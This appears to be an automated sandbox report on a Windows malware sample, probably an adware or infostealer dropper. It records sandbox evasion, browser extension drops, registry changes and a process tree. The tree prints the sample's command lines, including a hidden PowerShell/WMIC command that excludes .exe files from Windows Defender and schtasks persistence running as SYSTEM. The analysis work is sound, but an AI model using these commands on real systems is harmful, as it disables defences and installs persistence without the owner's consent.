Analysis
-
max time kernel
300s -
max time network
286s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
04-07-2024 22:38
Static task
static1
Behavioral task
behavioral1
Sample
79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe
Resource
win7-20240419-en
General
-
Target
79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe
-
Size
7.3MB
-
MD5
9b4d40d862a5b8fc72c6551f44b4bf09
-
SHA1
1f1585afb8d3c85893d2ab77f84419776a1291b9
-
SHA256
79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17
-
SHA512
8ca4799f202f7a3093e5951b911971a586731b18b8c2a3ab166d5306e37e89aa511aad9cf8ec1703c8777a4ff4f43ec6f68997f84eba7993cd1958dc0627db45
-
SSDEEP
196608:91OUTxStjKgL80gHQBsGOD9vtGQo0ba/4a6beuy:3OUFSjKWgxWQo0c4a6yuy
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 38 3920 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2104 powershell.exe 1900 powershell.EXE 2672 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\International\Geo\Nation dsxSnPX.exe -
Executes dropped EXE 4 IoCs
pid Process 4572 Install.exe 3616 Install.exe 1788 Install.exe 1664 dsxSnPX.exe -
Loads dropped DLL 1 IoCs
pid Process 3920 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json dsxSnPX.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json dsxSnPX.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData dsxSnPX.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 dsxSnPX.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 dsxSnPX.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 dsxSnPX.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA dsxSnPX.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA dsxSnPX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 dsxSnPX.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\nWWVEJXizSHU2\PDsknhAdoUiCL.dll dsxSnPX.exe File created C:\Program Files (x86)\fLdzueVMGzfAC\KzrvRIH.dll dsxSnPX.exe File created C:\Program Files (x86)\ushFnVEJKMUn\XtEYDQK.dll dsxSnPX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak dsxSnPX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja dsxSnPX.exe File created C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\EwSXksc.dll dsxSnPX.exe File created C:\Program Files (x86)\fLdzueVMGzfAC\OiIAKSw.xml dsxSnPX.exe File created C:\Program Files (x86)\RNplELueU\DkhdUC.dll dsxSnPX.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi dsxSnPX.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak dsxSnPX.exe File created C:\Program Files (x86)\nWWVEJXizSHU2\NxjhajZ.xml dsxSnPX.exe File created C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\VUUwJpN.xml dsxSnPX.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi dsxSnPX.exe File created C:\Program Files (x86)\RNplELueU\KlbOVPZ.xml dsxSnPX.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\wgFtIVrBuHdIdLf.job schtasks.exe File created C:\Windows\Tasks\vczjtXgpVbXDKOBgh.job schtasks.exe File created C:\Windows\Tasks\bBfKaGDnIKdTdJZScE.job schtasks.exe File created C:\Windows\Tasks\QVuDljbAZykxnpoWI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4372 1788 WerFault.exe 85 2292 3616 WerFault.exe 75 3676 1664 WerFault.exe 155 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" dsxSnPX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dsxSnPX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" dsxSnPX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc7460-0000-0000-0000-d01200000000}\NukeOnDelete = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc7460-0000-0000-0000-d01200000000} dsxSnPX.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache dsxSnPX.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc7460-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket dsxSnPX.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3536 schtasks.exe 1012 schtasks.exe 4268 schtasks.exe 4580 schtasks.exe 4636 schtasks.exe 3464 schtasks.exe 1720 schtasks.exe 64 schtasks.exe 4576 schtasks.exe 4164 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 4224 powershell.exe 4224 powershell.exe 4224 powershell.exe 1900 powershell.EXE 1900 powershell.EXE 1900 powershell.EXE 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 2672 powershell.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 2672 powershell.exe 2672 powershell.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe 1664 dsxSnPX.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2104 powershell.exe Token: SeIncreaseQuotaPrivilege 3228 WMIC.exe Token: SeSecurityPrivilege 3228 WMIC.exe Token: SeTakeOwnershipPrivilege 3228 WMIC.exe Token: SeLoadDriverPrivilege 3228 WMIC.exe Token: SeSystemProfilePrivilege 3228 WMIC.exe Token: SeSystemtimePrivilege 3228 WMIC.exe Token: SeProfSingleProcessPrivilege 3228 WMIC.exe Token: SeIncBasePriorityPrivilege 3228 WMIC.exe Token: SeCreatePagefilePrivilege 3228 WMIC.exe Token: SeBackupPrivilege 3228 WMIC.exe Token: SeRestorePrivilege 3228 WMIC.exe Token: SeShutdownPrivilege 3228 WMIC.exe Token: SeDebugPrivilege 3228 WMIC.exe Token: SeSystemEnvironmentPrivilege 3228 WMIC.exe Token: SeRemoteShutdownPrivilege 3228 WMIC.exe Token: SeUndockPrivilege 3228 WMIC.exe Token: SeManageVolumePrivilege 3228 WMIC.exe Token: 33 3228 WMIC.exe Token: 34 3228 WMIC.exe Token: 35 3228 WMIC.exe Token: 36 3228 WMIC.exe Token: SeIncreaseQuotaPrivilege 3228 WMIC.exe Token: SeSecurityPrivilege 3228 WMIC.exe Token: SeTakeOwnershipPrivilege 3228 WMIC.exe Token: SeLoadDriverPrivilege 3228 WMIC.exe Token: SeSystemProfilePrivilege 3228 WMIC.exe Token: SeSystemtimePrivilege 3228 WMIC.exe Token: SeProfSingleProcessPrivilege 3228 WMIC.exe Token: SeIncBasePriorityPrivilege 3228 WMIC.exe Token: SeCreatePagefilePrivilege 3228 WMIC.exe Token: SeBackupPrivilege 3228 WMIC.exe Token: SeRestorePrivilege 3228 WMIC.exe Token: SeShutdownPrivilege 3228 WMIC.exe Token: SeDebugPrivilege 3228 WMIC.exe Token: SeSystemEnvironmentPrivilege 3228 WMIC.exe Token: SeRemoteShutdownPrivilege 3228 WMIC.exe Token: SeUndockPrivilege 3228 WMIC.exe Token: SeManageVolumePrivilege 3228 WMIC.exe Token: 33 3228 WMIC.exe Token: 34 3228 WMIC.exe Token: 35 3228 WMIC.exe Token: 36 3228 WMIC.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 4224 powershell.exe Token: SeDebugPrivilege 1900 powershell.EXE Token: SeDebugPrivilege 2672 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1012 WMIC.exe Token: SeIncreaseQuotaPrivilege 1012 WMIC.exe Token: SeSecurityPrivilege 1012 WMIC.exe Token: SeTakeOwnershipPrivilege 1012 WMIC.exe Token: SeLoadDriverPrivilege 1012 WMIC.exe Token: SeSystemtimePrivilege 1012 WMIC.exe Token: SeBackupPrivilege 1012 WMIC.exe Token: SeRestorePrivilege 1012 WMIC.exe Token: SeShutdownPrivilege 1012 WMIC.exe Token: SeSystemEnvironmentPrivilege 1012 WMIC.exe Token: SeUndockPrivilege 1012 WMIC.exe Token: SeManageVolumePrivilege 1012 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1012 WMIC.exe Token: SeIncreaseQuotaPrivilege 1012 WMIC.exe Token: SeSecurityPrivilege 1012 WMIC.exe Token: SeTakeOwnershipPrivilege 1012 WMIC.exe Token: SeLoadDriverPrivilege 1012 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3012 wrote to memory of 4572 3012 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 74 PID 3012 wrote to memory of 4572 3012 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 74 PID 3012 wrote to memory of 4572 3012 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 74 PID 4572 wrote to memory of 3616 4572 Install.exe 75 PID 4572 wrote to memory of 3616 4572 Install.exe 75 PID 4572 wrote to memory of 3616 4572 Install.exe 75 PID 3616 wrote to memory of 2688 3616 Install.exe 77 PID 3616 wrote to memory of 2688 3616 Install.exe 77 PID 3616 wrote to memory of 2688 3616 Install.exe 77 PID 2688 wrote to memory of 4208 2688 forfiles.exe 79 PID 2688 wrote to memory of 4208 2688 forfiles.exe 79 PID 2688 wrote to memory of 4208 2688 forfiles.exe 79 PID 4208 wrote to memory of 2104 4208 cmd.exe 80 PID 4208 wrote to memory of 2104 4208 cmd.exe 80 PID 4208 wrote to memory of 2104 4208 cmd.exe 80 PID 2104 wrote to memory of 3228 2104 powershell.exe 81 PID 2104 wrote to memory of 3228 2104 powershell.exe 81 PID 2104 wrote to memory of 3228 2104 powershell.exe 81 PID 3616 wrote to memory of 4268 3616 Install.exe 83 PID 3616 wrote to memory of 4268 3616 Install.exe 83 PID 3616 wrote to memory of 4268 3616 Install.exe 83 PID 1788 wrote to memory of 2164 1788 Install.exe 86 PID 1788 wrote to memory of 2164 1788 Install.exe 86 PID 1788 wrote to memory of 2164 1788 Install.exe 86 PID 2164 wrote to memory of 3768 2164 powershell.exe 88 PID 2164 wrote to memory of 3768 2164 powershell.exe 88 PID 2164 wrote to memory of 3768 2164 powershell.exe 88 PID 3768 wrote to memory of 708 3768 cmd.exe 89 PID 3768 wrote to memory of 708 3768 cmd.exe 89 PID 3768 wrote to memory of 708 3768 cmd.exe 89 PID 2164 wrote to memory of 2564 2164 powershell.exe 90 PID 2164 wrote to memory of 2564 2164 powershell.exe 90 PID 2164 wrote to memory of 2564 2164 powershell.exe 90 PID 2164 wrote to memory of 1128 2164 powershell.exe 91 PID 2164 wrote to memory of 1128 2164 powershell.exe 91 PID 2164 wrote to memory of 1128 2164 powershell.exe 91 PID 2164 wrote to memory of 4476 2164 powershell.exe 92 PID 2164 wrote to memory of 4476 2164 powershell.exe 92 PID 2164 wrote to memory of 4476 2164 powershell.exe 92 PID 2164 wrote to memory of 1188 2164 powershell.exe 93 PID 2164 wrote to memory of 1188 2164 powershell.exe 93 PID 2164 wrote to memory of 1188 2164 powershell.exe 93 PID 2164 wrote to memory of 3336 2164 powershell.exe 94 PID 2164 wrote to memory of 3336 2164 powershell.exe 94 PID 2164 wrote to memory of 3336 2164 powershell.exe 94 PID 2164 wrote to memory of 4888 2164 powershell.exe 95 PID 2164 wrote to memory of 4888 2164 powershell.exe 95 PID 2164 wrote to memory of 4888 2164 powershell.exe 95 PID 2164 wrote to memory of 3488 2164 powershell.exe 96 PID 2164 wrote to memory of 3488 2164 powershell.exe 96 PID 2164 wrote to memory of 3488 2164 powershell.exe 96 PID 2164 wrote to memory of 2600 2164 powershell.exe 97 PID 2164 wrote to memory of 2600 2164 powershell.exe 97 PID 2164 wrote to memory of 2600 2164 powershell.exe 97 PID 2164 wrote to memory of 5088 2164 powershell.exe 98 PID 2164 wrote to memory of 5088 2164 powershell.exe 98 PID 2164 wrote to memory of 5088 2164 powershell.exe 98 PID 2164 wrote to memory of 4460 2164 powershell.exe 99 PID 2164 wrote to memory of 4460 2164 powershell.exe 99 PID 2164 wrote to memory of 4460 2164 powershell.exe 99 PID 2164 wrote to memory of 856 2164 powershell.exe 100 PID 2164 wrote to memory of 856 2164 powershell.exe 100 PID 2164 wrote to memory of 856 2164 powershell.exe 100 PID 2164 wrote to memory of 4192 2164 powershell.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe"C:\Users\Admin\AppData\Local\Temp\79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\7zS63EA.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\7zS66D8.tmp\Install.exe.\Install.exe /GdidIh "385137" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bBfKaGDnIKdTdJZScE" /SC once /ST 22:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS66D8.tmp\Install.exe\" pa /aididiw 385137 /S" /V1 /F4⤵
- Drops file in Windows directory
